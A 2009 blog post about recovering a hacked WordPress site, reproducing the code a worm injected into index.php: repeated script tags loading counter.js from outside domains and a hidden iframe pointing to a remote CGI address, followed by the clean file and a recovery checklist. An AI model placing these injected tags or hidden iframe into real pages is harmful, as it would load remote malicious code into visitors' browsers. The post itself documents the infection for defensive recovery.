Wordpress Warning: Unexpected character in input: ”’ (ASCII=39) state=1 in /home/ : Simplysimple.info
Home >

WordPress Warning: Unexpected character in input: ”’ (ASCII=39) state=1 in /home/

By | Posted, September 11th, 2009 and modified on October 4th, 2010.

Woke up today morning to find that my WordPress blog was not working. I got the following as part of the error message when loading the site:

Warning: Unexpected character in input: ”’ (ASCII=39) state=1 in /home/

Googling the same, I found out that it was caused by either by a worm or virus which steals your WordPress password and hacks all the index pages on your website. In mine it had added the following:

<!– ~ –><script type=”text/javascript” src=”http://ankaraelt.com/images/counter.js”></script>
<script type=”text/javascript” src=”http://antikontainer.com/images/counter.js”></script><!– ~ –><!– ~ –><script type=”text/javascript” src=”http://ankaraelt.com/images/counter.js”></script>
<script type=”text/javascript” src=”http://antikontainer.com/images/counter.js”></script><!– ~ –><!– ~ –><script type=”text/javascript” src=”http://ankaraelt.com/images/counter.js”></script>
<script type=”text/javascript” src=”http://antikontainer.com/images/counter.js”></script><!– ~ –><!– ~ –><script type=”text/javascript” src=”http://ankaraelt.com/images/counter.js”></script>
<script type=”text/javascript” src=”http://antikontainer.com/images/counter.js”></script><!– ~ –><!– ~ –><script type=”text/javascript” src=”http://ankaraelt.com/images/counter.js”></script>
<script type=”text/javascript” src=”http://antikontainer.com/images/counter.j
<iframe src=”http://scudocomercial.myftp.biz:8080/ts/in.cgi?open7″ width=366 height=0 style=”visibility: hidden”></iframe>

I replaced the index.php from a backup of my site and my site was up again. When I compared it with the original version I found that it had changed line 17 of my index.php file require(‘./wp-blog-header.php’); to require(‘./wp-blog- Maybe it was a coding error on part of the virus/worm writer. The contents of the original index.php file are shown below. Probably if you don’t have a backup you can copy and paste the same to your index.php file but I cannot guarantee anything.

<?php
/**
* Front to the WordPress application. This file doesn’t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define(‘WP_USE_THEMES’, true);

/** Loads the WordPress Environment and Template */
require(‘./wp-blog-header.php’);
?>

If you got hacked, do the following:

  1. Back up your database (you can try the WP-DBManager plugin for WordPress)
  2. Backup your WordPress installation folder (ftp it using something like Filezilla)
  3. Check whether your .htaccess file(s) have been modified or new ones created.
  4. Change your passwords
  5. Do a complete scan of your local system using Avast or Avira antivirus.
  6. Report the attack to your web hosting provider
 

Related Posts

  1. Solved: wordpress Fatal error: Allowed memory size of 33554432 bytes exhausted
  2. WordPress error : “Your backup folder might be visible to the public”
  3. Moving your WordPress blog
  4. [Solved] JRE persistent printing prompt
  5. Setting up automated backups for MySQL on Linux
  6. Setting Openoffice to always save in Microsoft Format
  7. Backing up and restoring Outlook 2003 & 2007
  8. Syncing data between two Ubuntu servers using rsync
  9. Webhosting and your MYSQL data
  10. Solved: Cannot send outgoing Gmail in Evolution

Comment on this post

If you would like to make a comment, please fill out the form below.

Name (required)

Email (required)

Website

Comments

IMPORTANT! To be able to proceed, you need to solve the following simple math (so we know that you are a human) :-)

What is 7 + 8 ?
Please leave these two fields as-is:

+(reset)-
Follow me
© 2009 Simplysimple.info webmaster simplysimple.info